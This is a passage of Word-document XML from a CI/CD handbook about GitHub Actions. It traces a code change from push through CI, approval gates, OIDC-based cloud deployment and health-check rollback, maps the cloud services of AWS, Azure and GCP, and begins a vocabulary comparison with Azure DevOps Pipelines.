        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">yaml    jobs:      build:        runs-on: ubuntu-latest        timeout-minutes: 15    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Self-hosted runners</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — if you have the capacity, runners you host yourself cost zero minutes. You're trading money for maintenance work, so pick your battles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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17. From push to production — the end-to-end flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Everything in this handbook is one piece of a larger picture. This section draws that picture. Follow a single code change from the moment a developer pushes it, all the way to a running version in production on a cloud provider. Every box in the diagram below maps back to something you've already read.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The full flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="180"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3810000" cy="13763625"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="end-to-end.png" descr="end-to-end.png" title="end-to-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3763625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">What happens at each stage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1. Developer pushes a branch.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Local code leaves the laptop and lands on GitHub. No automation has run yet — this is just a push.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2. PR opened.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> The moment a pull request is opened against </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, your </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">pull_request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> workflows fire. This is where CI lives.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3. CI runs in parallel.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lint, tests across the version matrix (with dependency caching to keep it fast), CodeQL static analysis, and dependency review all kick off together. They don't need each other, so </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">needs:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> is absent. Fail-fast is usually on — one failure cancels the rest.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4. All green?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> If any check fails, the PR is blocked. The author pushes a fix and the cycle repeats. Nothing downstream happens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5. PR merged to main.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> A push event now fires on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. Your CD workflow picks it up.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6. Build and push the image.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> The workflow builds a Docker image, tags it with the commit SHA (and/or a semantic version), and pushes to a registry. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">GITHUB_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> is enough to push to GHCR; cloud registries (ECR, ACR, GAR) authenticate via OIDC (step 9).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7. Deploy to Dev, then Staging.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Both are automatic. Each uses a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">environment:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> scope that holds its own secrets and its own URL. Concurrency control (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">concurrency: { cancel-in-progress: true }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">) makes sure only one deploy runs per branch at a time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8. Manual approval gate.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Before production, a human has to click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Approve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the Actions tab. This is the Environments feature doing its job — required reviewers block the production job until someone signs off.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">9. OIDC token handoff.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Your workflow exchanges a GitHub-signed identity token with the cloud provider. No long-lived keys in GitHub Secrets — the cloud verifies the token came from this specific workflow in this specific repo and mints a short-lived credential in response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">10. Cloud orchestrator updates.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> The short-lived credential is used to tell the cloud's orchestration service to pull the new image and roll the fleet. On AWS that's ECS or EKS. On Azure, AKS or App Service. On GCP, GKE or Cloud Run.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">11. Health check.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Once rolled, the workflow pings the service's health endpoint. If it passes, the run marks success and monitoring takes over from there. If it fails, the rollback step kicks in — re-deploy the previous SHA, send a Slack alert, and fail the workflow so the on-call team sees it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The cloud side, by provider</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The diagram labels the three cloud providers inline. Here's the same mapping as a table, so you can look up the equivalent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Step</w:t>
            </w:r>
          </w:p>
        </w:tc>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AWS</w:t>
            </w:r>
          </w:p>
        </w:tc>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Azure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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GCP</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Container registry</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ECR</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ACR</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Artifact Registry</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Cluster / compute</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ECS, EKS, Lambda</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AKS, App Service, Functions</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GKE, Cloud Run, Cloud Functions</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Identity (OIDC)</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IAM role via OIDC provider</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Service principal via federated credential</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Workload Identity Federation</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Secrets (if not using OIDC)</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AWS Secrets Manager / SSM</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Azure Key Vault</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Secret Manager</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Monitoring</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CloudWatch</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Application Insights / Monitor</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Cloud Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Logs</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CloudWatch Logs</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Azure Log Analytics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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Cloud Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The shape of the flow is the same in every case. The service names change; the pattern doesn't.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Which pieces of this handbook show up where</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">If this section feels familiar, that's the point. The whole diagram is earlier sections composed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Stage in the flow</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What you use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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Covered in</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PR-triggered lint and tests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Parallel jobs, no </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">needs: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Scenario 3, Recipe 1</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Matrix testing across versions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strategy.matrix</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Recipe 5</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Dependency cache for speed</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actions/cache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Recipe 7</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CodeQL, dependency review</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GitHub-native security</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Section 15</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Build Docker image and push to GHCR</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Recipe 6</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Section 11</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Dev → Staging → Prod with approval</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Environments + required reviewers</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Scenario 7</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Only one deploy per branch at a time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concurrency</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Scenario 9</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OIDC to the cloud provider</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permissions: { id-token: write }</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Section 10</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Health check + auto-rollback</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continue-on-error</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">steps.*.outcome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Scenario 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Slack alert on failure</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if: failure()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + webhook</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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Recipe 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Reading the flow in reverse</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">A useful exercise: run your finger backwards up the diagram from "Deploy complete" to "Developer pushes branch" and for each stage, ask yourself:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">What triggers this stage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">What could fail here?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Where are the secrets coming from?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Who has permission to change this configuration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">If you can answer all four at every stage of your own pipeline, you understand it well enough to be on-call for it. That, more than memorizing syntax, is the thing that makes someone genuinely useful at CI/CD.</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18. GitHub Actions vs Azure DevOps Pipelines</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">If your team has been on Azure for a while, you've probably already used Azure DevOps Pipelines (its older name was VSTS). It solves the same problem GitHub Actions does, with slightly different vocabulary. This section is a quick "Rosetta Stone" plus an honest opinion on which to pick.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The vocabulary maps almost one-to-one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GitHub Actions</w:t>
            </w:r>
          </w:p>
        </w:tc>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Azure DevOps Pipelines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Workflow</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Pipeline</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Job</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Stage / Job</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Step</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Step / Task</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Action</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Task</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Runner</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Agent</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.github/workflows/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (folder)</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azure-pipelines.yml</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (root)</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Marketplace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Tasks marketplace</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GITHUB_TOKEN</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onsolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">System.AccessToken</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Environments + required reviewers</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Environments + approvals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Reusable workflows</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Templates</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Composite actions</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Step templates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
